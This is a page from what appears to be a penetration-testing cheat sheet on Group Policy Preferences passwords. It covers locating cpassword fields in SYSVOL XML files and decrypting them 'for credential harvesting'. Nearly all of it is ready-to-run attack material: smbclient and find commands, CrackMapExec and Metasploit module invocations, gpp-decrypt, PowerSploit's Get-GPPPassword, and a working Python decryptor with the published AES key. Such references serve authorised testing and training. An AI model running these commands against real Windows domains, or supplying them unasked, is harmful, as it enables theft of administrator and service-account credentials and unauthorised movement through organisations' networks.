> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# GPP Passwords

> Group Policy Preferences passwords: find and decrypt cpassword from SYSVOL for credential harvesting.

## Overview

Group Policy Preferences (GPP) stored credentials in `cpassword` field in XML files on SYSVOL. AES key was published by Microsoft → any domain user can decrypt.

***

## Find GPP Files

### Manual

```bash theme={"dark"}
smbclient //DC_IP/SYSVOL -U 'user%password'
```

```bash theme={"dark"}
find /mnt/sysvol -name "*.xml" -exec grep -l "cpassword" {} \;
```

Look in:

* `Groups.xml` — local admin passwords
* `Services.xml` — service account passwords
* `Scheduledtasks.xml` — scheduled task credentials
* `DataSources.xml` — database credentials
* `Drives.xml` — mapped drive credentials
* `Printers.xml` — printer credentials

### CrackMapExec

```bash theme={"dark"}
crackmapexec smb DC_IP -u user -p password -M gpp_password
```

### Metasploit

```bash theme={"dark"}
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS DC_IP
set SMBUser user
set SMBPass password
run
```

***

## Decrypt cpassword

### gpp-decrypt

```bash theme={"dark"}
gpp-decrypt "ENCRYPTED_CPASSWORD"
```

### Python

```python theme={"dark"}
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
iv = b'\x00' * 16
cpassword = "CPASSWORD_HERE"
cpassword += "=" * (-len(cpassword) % 4)   # GPP strips base64 padding — re-add it
enc = base64.b64decode(cpassword)
cipher = AES.new(key, AES.MODE_CBC, iv)
print(unpad(cipher.decrypt(enc), AES.block_size).decode('utf-16-le'))
```

***

## Get-GPPPassword (PowerSploit)

```powershell theme={"dark"}
Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword
```

***

## Notes

* MS14-025 patched creation of new GPP passwords (2014)
* Existing GPP passwords NOT removed by patch
* Old domains often still have them in SYSVOL
* Any authenticated domain user can read SYSVOL

***

## Quick Reference

| Task        | Command                                               |
| ----------- | ----------------------------------------------------- |
| CME         | `crackmapexec smb DC -u user -p pass -M gpp_password` |
| Decrypt     | `gpp-decrypt "cpassword"`                             |
| Manual      | Search SYSVOL for `*.xml` with `cpassword`            |
| PowerSploit | `Get-GPPPassword`                                     |
